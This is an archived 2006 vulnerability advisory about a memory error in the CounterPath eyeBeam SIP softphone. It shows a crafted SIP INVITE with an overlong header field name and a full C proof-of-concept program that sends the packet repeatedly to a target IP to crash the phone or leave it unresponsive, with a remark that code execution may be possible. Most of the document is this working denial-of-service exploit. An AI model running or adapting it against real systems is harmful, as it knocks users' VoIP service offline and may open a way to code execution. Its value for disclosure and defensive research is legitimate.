Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11064
HistoryJan 17, 2006 - 12:00 a.m.

CounterPath eyeBeam Handing SIP header Vulnerabilities

2006-01-1700:00:00
vulners.com
9

eyeBeam is a SIP softphone supporting open standards for VoIP, Video and Instant Messaging.
There is a vunerability in it while handing SIP header with a large field name like this:

INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119
From: 1249 <sip:[email protected]>;tag=1249
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver <sip:[email protected]>
Call-ID: 4166@<172.16.3.6> <–Change it to target IP
CSeq: 18571 INVITE
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 130

v=0
o=1249 1249 1249 IN IP4 127.0.0.1
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

If you send the packet(several times) to eyeBeam when it's starting and have no call opreation,
then it will crashed for reading a unvalid address which we can control.
If you send it(several times) when it's in a call, then it will be unresponse(will not dial and receive any more) or crashed for writing a address(cannot control it now, but it's possible, and as I think, it can lead to execute code).
It looks like some memory operation error exists.

Addtion : the lastest version is affected.

====================eyeBeam_dos.c========================

/*********************************************************
eyeBeam handling SIP header DOS POC
Author : ZwelL
Email : [email protected]
Blog : http://www.donews.net/zwell
Data : 2006.1.15
*********************************************************/

#include <stdio.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

char *sendbuf1 =
"INVITE sip:[email protected] SIP/2.0\r\n"
"Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119\r\n"
"From: test <sip:[email protected]>;tag=1249\r\n"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaa: test <sip:[email protected]>\r\n";

char *sendbuf2 =
"CSeq: 18571 INVITE\r\n"
"Expires: 1200\r\n"
"Max-Forwards: 70\r\n"
"Content-Type: application/sdp\r\n"
"Content-Length: 130\r\n"
"\r\n"
"v=0\r\n"
"o=1249 1249 1249 IN IP4 127.0.0.1\r\n"
"s=Session SDP\r\n"
"c=IN IP4 127.0.0.1\r\n"
"t=0 0\r\n"
"m=audio 9876 RTP/AVP 0\r\n"
"a=rtpmap:0 PCMU/8000\r\n";

int main(int argc, char **argv)
{
WSADATA wsaData;
SOCKET sock;
sockaddr_in RecvAddr;
char sendbuf[4096];
int iResult;
int port = 8376; //default is 8376, but SIP's default port is 5060

    printf&#40;&quot;eyeBeam handling SIP header DOS POC&#92;nAuthor : ZwelL&#92;n&quot;&#41;;
    printf&#40;&quot;Email : [email protected]&#92;nBlog : http://www.donews.net/zwell&#92;n&#92;n&quot;&#41;;
    if&#40;argc &lt; 2&#41;
    {
            printf&#40;&quot;Usage : &#37;s &lt;target ip&gt; [port]&#92;n&quot;, argv[0]&#41;;
            return 0;
    }

    if&#40;argc == 3&#41;
            port = atoi&#40;argv[2]&#41;;

iResult = WSAStartup&#40;MAKEWORD&#40;2,2&#41;, &amp;wsaData&#41;;
if &#40;iResult != NO_ERROR&#41;
    {
    printf&#40;&quot;Error at WSAStartup&#40;&#41;&#92;n&quot;&#41;;
            return 0;
    }

    sock = socket&#40;AF_INET, SOCK_DGRAM, IPPROTO_UDP&#41;;

    ZeroMemory&#40;&amp;RecvAddr, sizeof&#40;RecvAddr&#41;&#41;;
RecvAddr.sin_family = AF_INET;
RecvAddr.sin_port = htons&#40;&#40;short&#41;port&#41;; 
RecvAddr.sin_addr.s_addr = inet_addr&#40;argv[1]&#41;;

    printf&#40;&quot;Target is : &#37;s&#92;t port is : &#37;d&#92;r&#92;n&quot;, argv[1], port&#41;;
    for&#40;int i=0; i&lt;20; i++&#41;
    {
            sprintf&#40;sendbuf, &quot;&#37;sCall-ID: 4166@&lt;&#37;s&gt;&#92;r&#92;n&#37;s&quot;, sendbuf1, argv[1], sendbuf2&#41;;
            if&#40;SOCKET_ERROR == sendto&#40;sock, 
                            sendbuf, 
                            strlen&#40;sendbuf&#41;, 
                            0, 
                            &#40;SOCKADDR *&#41; &amp;RecvAddr, 
                            sizeof&#40;RecvAddr&#41;&#41;&#41;
            {
                    printf&#40;&quot;sendto wrong:&#37;d&#92;n&quot;, WSAGetLastError&#40;&#41;&#41;;
                    continue;
            }
    }

    printf&#40;&quot;Now check the target is crafted?&#92;r&#92;n&quot;&#41;;

WSACleanup&#40;&#41;;
return 1;

}